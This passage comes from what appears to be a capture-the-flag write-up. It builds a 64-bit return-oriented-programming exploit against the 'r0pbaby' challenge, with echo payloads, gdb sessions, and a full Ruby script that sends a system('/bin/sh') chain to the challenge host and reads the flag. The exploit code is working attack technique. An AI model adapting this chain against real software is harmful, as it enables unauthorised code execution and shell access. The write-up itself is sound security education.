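# Hypothetical helper: render a 64-bit address as \x.. escapes for echo -e.
# "Q<" packs an unsigned 64-bit integer in little-endian byte order.
def echo_escape(addr)
  [addr].pack("Q<").bytes.map { |b| "\\x%02x" % b }.join
end

puts("sh_addr     = 0x%x  %s" % [sh_addr, echo_escape(sh_addr)])
puts("gadget_addr = 0x%x  %s" % [gadget_addr, echo_escape(gadget_addr)])
```

The escaped forms are what get pasted into the echo commands in the rest of this section.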

So now, let’s change the exploit we used to crash it a long time ago: we replace the “B”s with the address of our gadget, in little endian format:

$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00CCCCCCCCDDDDDDDD\n' | ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
[...]
Menu:
Segmentation fault (core dumped)

Great! It crashed as expected! Let’s take a look at HOW it crashed:

$ gdb -q ./r0pbaby ./core
Core was generated by `./r0pbaby'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007ffff792b2cb in clone () from /lib64/libc.so.6
(gdb) x/i $rip
=> 0x7ffff792b2cb <clone+107>:  call   rax

It crashed on the call at the end of the gadget, which makes sense! Let’s check out what it’s trying to call and what it’s using as a parameter:

(gdb) print/x $rax
$1 = 0x4343434343434343
(gdb) print/x $rdi
$2 = 0x4444444444444444

It’s trying to call “CCCCCCCC” with the parameter “DDDDDDDD”. Awesome! Let’s try it again, but this time we’ll plug in sh_addr in place of “DDDDDDDD” to make sure that’s working (I strongly believe in incremental testing :) ):

$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00CCCCCCCC\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby
[...]
Segmentation fault (core dumped)
$ gdb -q ./r0pbaby ./core
[...]
(gdb) x/i $rip
=> 0x7ffff792b2cb <clone+107>:  call   rax

It’s still crashing in the same place! We don’t have to check rax, we know it’ll be 0x4343434343434343 (“CCCCCCCC”) again. But let’s check out if rdi is right:

(gdb) print/x $rdi
$2 = 0x7ffff79a307c
(gdb) x/s $rdi
0x7ffff79a307c: "/bin/sh"

All right, the parameter is set properly!

One last step: replace the “CCCCCCCC” (the value the gadget loads into rax and then calls) with the address of system(), 0x00007ffff7883960:

$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00\x60\x39\x88\xf7\xff\x7f\x00\x00\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby

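Unfortunately, when you run it like this, returning into system() doesn’t get you a usable shell. I couldn’t figure out why, but on Twitter Jan Kadijk said that it’s likely because system() ends when it sees the end of file (EOF) marker on its input, which makes perfect sense: echo closes the pipe as soon as it has written the payload.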

So in the interest of proving that this actually returns to a function, we’ll call printf (0x00007FFFF7892F10) instead:

$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00\x10\x2f\x89\xf7\xff\x7f\x00\x00\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
/bin/sh

It prints out its first parameter - “/bin/sh” - proving that printf() was called and therefore the return chain works!
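To make the layout of that final payload explicit, here’s a small Ruby sketch that builds it and then walks it the way the CPU does. It assumes the gadget behaves like “pop rax; pop rdi; call rax”, which is what the register dump above suggests; build_payload and simulate are hypothetical helper names, and the addresses are the ones from my machine:

```ruby
# Addresses from the walkthrough above (ASLR off, my libc)
SYSTEM_ADDR = 0x00007ffff7883960
GADGET_ADDR = SYSTEM_ADDR + 0xa7969
SH_ADDR     = SYSTEM_ADDR + 0x11f71c
PRINTF_ADDR = 0x00007ffff7892f10

# 8 bytes of padding (lands on the saved frame pointer), then three
# little-endian 64-bit values: gadget, function to call, its argument.
def build_payload(gadget, target, arg)
  "AAAAAAAA".b + [gadget, target, arg].pack("Q<*")
end

# Walk the payload as a list of 64-bit stack slots.
# Assumption: the gadget is "pop rax; pop rdi; call rax".
def simulate(payload)
  stack = payload.unpack("Q<*")
  stack.shift          # slot that overwrites the saved frame pointer
  rip = stack.shift    # main()'s return address -> the gadget
  rax = stack.shift    # pop rax
  rdi = stack.shift    # pop rdi
  { gadget: rip, call_target: rax, rdi: rdi }
end

payload = build_payload(GADGET_ADDR, PRINTF_ADDR, SH_ADDR)
regs = simulate(payload)
regs.each { |name, value| puts("%-11s = 0x%x" % [name, value]) }
```

Swapping PRINTF_ADDR for SYSTEM_ADDR gives the payload from the previous step. The bytes are the same ones passed to echo -ne above.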

The exploit

Here’s the full exploit in Ruby. If you want to run this against your own system, you’ll have to calculate the offset of the “/bin/sh” string and the handy-dandy gadget first! Just find them in IDA or objdump or whatever and subtract the address of system() from them.

#!/usr/bin/ruby

require 'socket'

SH_OFFSET_REAL = 0x13669b
SH_OFFSET_MINE = 0x11f71c

GADGET_OFFSET_REAL = 0xb3e39
GADGET_OFFSET_MINE = 0xa7969

#HOST = "localhost"
HOST = "r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me"

PORT = 10436

s = TCPSocket.new(HOST, PORT)

# Receive until the string matches the regex, then delete everything
# up to the regex
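def recv_until(s, regex)
  buffer = ""

  loop do
    data = s.recv(1024)
    # recv returns nil or "" once the connection closes; bail out
    # instead of looping forever
    raise("Connection closed while waiting for #{regex}") if(data.nil? || data.empty?)

    buffer += data
    if(buffer =~ /#{regex}/m)
      return buffer.gsub(/.*#{regex}/m, '')
    end
  end
end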

# Get the address of "system"
puts("Getting the address of system()...")
s.write("2\n")
s.write("system\n")
system_addr = recv_until(s, "Symbol system: ").to_i(16)
puts("system() is at 0x%08x" % system_addr)

# Build the ROP chain
puts("Building the ROP chain...")
# Note: the little-endian modifier goes AFTER the directive ("Q<", not "<Q")
payload = "AAAAAAAA" +
  [system_addr + GADGET_OFFSET_REAL].pack("Q<") + # address of the gadget
  [system_addr].pack("Q<") +                      # address of system
  [system_addr + SH_OFFSET_REAL].pack("Q<") +     # address of "/bin/sh"
  ""

# Write the ROP chain
puts("Sending the ROP chain...")
s.write("3\n")
s.write("#{payload.length}\n")
s.write(payload)

# Tell the program to exit
puts("Exiting the program...")
s.write("4\n")

# Give sh some time to start
puts("Pausing...")
sleep(1)

# Write the command we want to run
puts("Attempting to read the flag!")
s.write("cat /home/r0pbaby/flag\n")

# Receive forever
loop do
  x = s.recv(1024)

  if(x.nil? || x == "")
    puts("Done!")
    exit
  end
  puts(x)
end
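If you don’t feel like digging through IDA for the two offsets, something like the following rough Ruby sketch can find them by searching the libc file for raw bytes. It makes several assumptions that aren’t from the steps above: that the gadget is encoded as 58 5f ff d0 (pop rax; pop rdi; call rax), that file offsets differ by the same amount as runtime addresses (true when everything lives in the same loaded segment, but check your libc), and that you already have system()’s offset from a symbol tool. offsets_from_system is a hypothetical helper name, and the “libc” here is a tiny fake blob so the sketch runs anywhere:

```ruby
# Assumed byte patterns (verify them against your own libc):
SH_BYTES     = "/bin/sh\x00".b       # the NUL-terminated string
GADGET_BYTES = "\x58\x5f\xff\xd0".b  # pop rax; pop rdi; call rax

# Hypothetical helper: offsets of both patterns relative to system().
# libc_bytes is the raw file contents; system_offset is where system()
# lives in that file (taken from a symbol table, not computed here).
def offsets_from_system(libc_bytes, system_offset)
  sh     = libc_bytes.index(SH_BYTES)
  gadget = libc_bytes.index(GADGET_BYTES)
  raise("pattern not found") if sh.nil? || gadget.nil?

  { sh: sh - system_offset, gadget: gadget - system_offset }
end

# Tiny synthetic "libc": gadget at 0x10, "/bin/sh" at 0x20.
# For a real file you would use File.binread with your libc's path.
fake_libc = ("\x90".b * 0x10) + GADGET_BYTES + ("\x90".b * 0x0c) + SH_BYTES
offsets = offsets_from_system(fake_libc, 0x08)
puts("sh offset:     0x%x" % offsets[:sh])
puts("gadget offset: 0x%x" % offsets[:gadget])
```

Only the first match of each pattern is used, so it’s worth confirming the hits in a disassembler before trusting them.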

[update] Or... do it the easy way

After I posted this, I got a tweet from @gaasedelen informing me that libc has a “magic” address that will literally call exec() with “/bin/sh”, making much of this unnecessary for this particular level. You can find it by seeing where the “/bin/sh” string is referenced. You can return to that address and a shell pops.

But it’s still a good idea to know how to construct a ROP chain, even if it’s not strictly necessary. :)

Conclusion

And that’s how to perform a ROP attack against a 64-bit binary! I’d love to hear feedback!